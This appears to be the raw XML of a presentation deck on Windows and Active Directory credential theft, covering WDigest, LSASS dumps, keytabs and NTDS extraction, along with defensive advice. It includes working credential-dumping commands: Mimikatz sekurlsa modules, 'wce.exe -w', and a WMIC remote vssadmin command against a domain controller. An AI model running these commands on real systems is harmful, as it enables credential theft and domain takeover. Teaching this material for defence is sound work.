              <a:t>AND</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t> a registry modification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Else… Attackers can use simple tools to retrieve the password</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Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t> for example:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>sekurlsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>wdigest</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
            </a:b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WCE</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>wce.exe -w</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="100"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92567741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Brace yourself</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790210" y="2750522"/>
            <a:ext cx="9056155" cy="304083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3200" b="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>The techniques and tools described in this section are possible because a system has already been breached.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" b="1">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="1250">
                    <a:srgbClr val="505050"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="505050"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="0"/>
              </a:gradFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>They cannot be used if an attacker has no prior footprint in the environment. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="1250">
                    <a:srgbClr val="505050"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="505050"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="0"/>
              </a:gradFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA961108-5A6C-4787-A172-48735B42F9F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10357029" y="2947788"/>
            <a:ext cx="2334881" cy="1429167"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6098FBBA-5A34-47E8-9256-BA79E221C00A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9610173" y="4753118"/>
            <a:ext cx="3006957" cy="1505000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="202078217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Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>wdigest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721292"/>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privilege::debug</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sekurlsa</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wdigest</a:t>
            </a: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8262950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WCE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>wdigest</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311950"/>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wce.exe -w</a:t>
            </a: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3791077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674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177B48-4B91-4450-97B5-A9C2D9542FF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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF6B7996-A59B-4810-8CE7-8CC7BC0BBF5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>How Digest Authentication Works </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Digest Authentication Architecture">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4032A731-4C46-4226-8144-E113DF093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338" y="1735180"/>
            <a:ext cx="6135063" cy="485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434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Offline credential theft</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22898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Since LSASS has secrets in the memory, a dump of the process will expose the same information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Without the privilege requirements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Get a dump and read the secrets from it…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Again, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t> is your go-to tool for it</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="8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20506480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err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> and LSASS dump</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721292"/>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err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sekurlsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>::minidump C:\lsass.DMP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sekurlsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>logonpasswords</a:t>
            </a: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a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-CA" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="355861590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Kerberos interoperability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2431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Kerberos requires </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" err="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>keytabs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t> on many Unix/Linux systems</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="8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err="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>Keytabs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t> are files containing the encryption key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are not encrypted</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Finding a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" err="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>keytab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t> is like finding the password of the account for which the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" err="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>keytab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t> has been generated</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEDA39D4-DB1E-45F8-A211-B5C6F3D58A59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2284085" y="3497262"/>
            <a:ext cx="7702394" cy="1818959"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="0078D7"/>
            </a:solidFill>
          </a:ln>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lgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="571500" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="0179D7"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Keytabs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0179D7"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> should be handled like passwords!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="571500" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>keytabs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> in open shares</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="571500" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>keytabs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> sent via emails</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="112503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800219"/>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fr-FR" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000"/>
              <a:t>IFM Install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" err="1"/>
              <a:t>From</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000"/>
              <a:t> Media</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25612168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How to get the secrets?</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55509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From the domain controllers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actual database on the file system could be stolen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a backup of the database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actual physical hard drive could be stolen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Or the virtual hard drive if the DC is a virtual machine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From a memory dump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Via the network (through the replication API)</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From the systems where administrative accounts are used</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Read them from the memory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Keylogger on the system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Listening the network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>leverage</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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86AC42C4-8EB5-48F2-85D9-EABDB4D58C5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7821750" y="1922261"/>
            <a:ext cx="900459" cy="930855"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23842166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How to use them? </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0811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Abuse the NTLM protocol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Pass-the-hash</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Abuse the Kerberos protocol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Pass-the-ticket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Kerberos Roasting</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Silver Ticket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Golden Ticket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Abuse the others…</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WDigest</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3230567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Crack the NTDS database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472744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NTDS database contains all users’ secrets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is encrypted</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But the encryption key is on the local SYSTEM hive…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 contains the hashes, not the cleartext passwords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Unless the account has the reversible encryption flag on</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You need to be a member of a privileged group to get a hold on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Built-in Administrators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Backup Operators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Server Operators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Print Operators</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23289074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Remote copy of the database</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366141" y="1922261"/>
            <a:ext cx="11887200" cy="581082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database is in use, hence cannot be copied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Unless you use the shadow copy driver to do a copy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>Builtin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t> in Windows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be run remotely via WMI or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>WinRM</a:t>
            </a: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This requires to be a member of the built-in Administrators group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locate the volume of the database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create a showdown copy of it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copy the database and the System hive over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open it and use tools to retrieve hashes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 virtualization platform administrators have full access to the guests data and OS</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4482992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73982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WMIC remote copy</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CA9B136-E1F5-404B-AD0C-8B4B630DDCA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="450574" y="1960010"/>
            <a:ext cx="11545288" cy="4592026"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="505050"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="146304" rIns="182880" bIns="146304" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wmic /node:DC1 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>user:CONTOSO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\administrator /password:domainadminsvc123 process call create "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>vssadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400">
                <a:solidFill>
